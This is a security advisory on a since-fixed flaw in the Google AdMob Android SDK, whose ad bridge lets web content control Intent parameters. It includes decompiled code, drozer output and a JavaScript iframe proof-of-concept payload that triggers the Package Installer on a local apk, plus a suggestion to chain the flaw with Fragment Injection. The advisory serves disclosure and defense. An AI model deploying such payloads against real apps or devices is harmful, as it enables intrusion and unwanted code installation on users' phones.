Lately we have been analysing mobile advertising networks and in particular the Software Development Kits (SDKs) that the networks make available to application developers for the purpose of monetising their applications. During this research, we have found that a lot of applications expose mobile device users to the very real threat of compromise. We have found a number of exploitable cross-platform vulnerabilities, and we are still in the early stages of looking into this area.
We reported this issue to the vendor, and they have confirmed it is fixed in version 4.0. If you make use of this library in your application, it is recommended that you update to the latest available version.
The Google AdMob SDK was downloaded from Google and de-compiled. The bridge was found to be implemented within the package com.google.ads.internal (class i) that contains the ‘shouldOverrideUrlLoading’ method, which in-turn calls the method ‘launchAdActivity’ within the ‘com.google.ads’ package (AdActivity class). The attacker can control all of the parameters passed to the ‘startActivity’ method. The parameters the attacker controls are as follows:
String str1 = (String)paramHashMap.get("u"); // data String str2 = (String)paramHashMap.get("m"); // type String str3 = (String)paramHashMap.get("i"); // intent String str4 = (String)paramHashMap.get("p"); // package String str5 = (String)paramHashMap.get("c"); // component String str6 = (String)paramHashMap.get("f"); // flags String str7 = (String)paramHashMap.get("e"); // extras
Numerous vulnerabilities have been discovered in various Android applications that were exploitable due to exposed Intent Activities. The following resources provide insight into the attack surface exposure:
A vulnerability was recently discovered by researchers at IBM Security Systems named Fragment Injection that affects applications that extend the base class android.preference.PreferenceActivity. This allows these applications to execute arbitrary code in the context of the target application via Intent Activities. There is potential to use the vulnerability discovered in the Google AdMob library as a vector to exploit the “Fragment Injection” issue remotely.
While the vulnerability within the Google AdMob SDK does not in itself lead to a compromise, it can be used as an entry point to target other applications that may expose vulnerable activities. Drozer can be used to analyse the attack surface of installed applications. An example analysis of the Package Installer application is presented below.
dz> run app.package.attacksurface com.android.packageinstaller Attack Surface: 2 activities exported 0 broadcast receivers exported 0 content providers exported 0 services exported
From the manifest file, we can easily obtain the parameters required to interact with the exported activities:
package="com.android.packageinstaller" activity name=".PackageInstallerActivity" action name="android.intent.action.INSTALL_PACKAGE" data mimeType="application/vnd.android.package-archive"
To exploit this issue, the activity can be called with attacker controlled parameters. As a Proof-of-Concept, the following payload can be used to launch the Package Installer application and install an apk from /mnt/sdcard/agent.apk:
iframe = document.createElement("IFRAME"); iframe.setAttribute("src", 'gmsg://mobileads.google.com/open?a=android.intent.action.INSTALL_PACKAGE&u=file:///mnt/sdcard/agent.apk &m=application/vnd.android.package-archive&i=android.intent.action.INSTALL_PACKAGE&p=com.android.packageinstaller'); document.documentElement.appendChild(iframe); iframe.parentNode.removeChild(iframe);
The parameters are listed below:
a = android.intent.action.INSTALL_PACKAGE // action u = file:///mnt/sdcard/agent.apk // data m = application/vnd.android.package-archive // type i = android.intent.action.INSTALL_PACKAGE // action p = com.android.packageinstaller // package